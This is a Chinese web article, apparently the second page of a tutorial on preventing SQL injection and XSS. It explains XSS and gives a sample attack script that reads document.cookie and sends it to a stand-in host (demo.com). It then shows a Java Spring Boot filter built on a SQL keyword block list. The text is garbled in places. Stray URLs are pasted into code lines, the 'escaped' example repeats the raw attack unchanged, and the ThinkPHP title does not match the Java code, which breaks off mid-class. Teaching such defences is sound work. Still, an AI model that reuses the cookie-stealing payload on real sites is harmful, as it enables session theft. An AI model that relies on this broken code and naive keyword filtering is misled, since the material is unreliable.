江苏龙网

  1. 主页 > 生活百科 > >

thinkphp如何防止sql注入xss攻击( 二 )

sql注入


7、不要过于细化返回的错误信息,如果目的是方便调试,就去使用后端日志,不要在接口上过多的暴露出错信息,毕竟真正的用户不关心太多的技术细节,只要话术合理就行 。
XSS 攻击简介
XSS 攻击,即跨站脚本攻击(Cross Site Scripting),它是 web 程序中常见的漏洞 。原理是攻击者往 web 页面里插入恶意的脚本代码(css代码、JAVAScript代码等),当用户浏览该页面时,嵌入其中的脚本代码会被执行,从而达到恶意攻击用户的目的 。如盗取用户cookie,破坏页面结构、重定向到其他网站等 。
理论上来说,web 页面中所有可由用户输入的地方,如果没有对输入的数据进行过滤处理的话,都会存在 XSS 漏洞;当然,我们也需要对模板视图中的输出数据进行过滤 。
XSS 攻击示例
有一个博客网站,提供了一个 web 页面(内含表单)给所有的用户发表博客,但该博客网站的开发人员并没有对用户提交的表单数据做任何过滤处理 。现在,我是一个攻击者,在该博客网站发表了一篇博客,用于盗取其他用户的cookie信息 。博客内容如下:
<b>This is a XSS test!</b>
<script>
var cookie = document.cookie;
window.open("http://demo.com/getCookie.php?param="+cookie);
</script>
这是一段 XSS 攻击代码 。当其他用户查看我的这篇博客时,他们的 cookie 信息就会被发送至我的 web 站点(http://demo.com/),如此,我就盗取了其他用户的 cookie 信息 。
预防 XSS 攻击
核心思想
永远不要相信用户的输入,必须对输入的数据作过滤处理 。
该函数会把字符串中的特殊字符转化为 HTML 实体,这样在输出时,恶意的代码就无法执行了 。这些特殊字符主要是 ’ " & < > 。
比如,我刚刚的恶意代码被过滤后,会变为下面的代码:
<b>This is a XSS test!</b>
<script>
var cookie = document.cookie;
window.open("http://demo.com/getCookie.php?param="+cookie);
</script>
这样,就可以预防大部分 XSS 攻击了 。
服务端代码处理
以springboot为例:
可利用过滤器进行设置,如下所示:
/**
* 防止sql注入,xss攻击
* 前端可以对输入信息做预处理,后端也可以做处理 。
*/
public class XssHttpServletRequestWrApper extends HttpServletRequestWrapper {
private final Logger log = LoggerFactory.getLogger(getClass());
private static String key = "and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char
|declare|;|or|-|+";
private static Set<String> notAllowedKeyWords = new HashSet<String>(0);
private static String replacedString="INVALID";
static {
String keyStr[] = key.split("\|");
for (String str : keyStr) {
notAllowedKeyWords.add(str);
}
}
private String currentUrl;
public XssHttpServletRequestWrapper(HttpServletRequest servletRequest) {
super(servletRequest);
currentUrl = servletRequest.getRequestURI();
}
/**覆盖getParameter方法,将参数名和参数值都做xss过滤 。
* 如果需要获得原始的值,则通过super.getParameterValues(name)来获取
* getParameterNames,getParameterValues和getParameterMap也可能需要覆盖
*/
@Override
public String getParameter(String parameter) {
String value = https://www.isolves.com/it/cxkf/yy/php/2019-10-14/super.getParameter(parameter);
if (value =https://www.isolves.com/it/cxkf/yy/php/2019-10-14/= null) {
return null;
}
return cleanXSS(value);
}
@Override
public String[] getParameterValues(String parameter) {
String[] values = super.getParameterValues(parameter);
if (values == null) {
return null;
【thinkphp如何防止sql注入xss攻击】}
int count = values.length;
String[] encodedValues = new String[count];
for (int i = 0; i < count; i++) {
encodedValues[i] = cleanXSS(values[i]);
}
return encodedValues;
}
@Override
public Map<String, String[]> getParameterMap(){
Map<String, String[]> values=super.getParameterMap();
if (values == null) {
return null;
}
Map<String, String[]> result=new HashMap<>();
for(String key:values.keySet()){
String encodedKey=cleanXSS(key);
int count=values.get(key).length;
String[] encodedValues = new String[count];
for (int i = 0; i < count; i++){
encodedValues[i]=cleanXSS(values.get(key)[i]);
}
result.put(encodedKey,encodedValues);
}
return result;


推荐阅读


上一篇:华为p30有nfc功能嘛 华为p50有NFC功能吗

下一篇:净水器多久换滤芯合适 净水器用多久换滤芯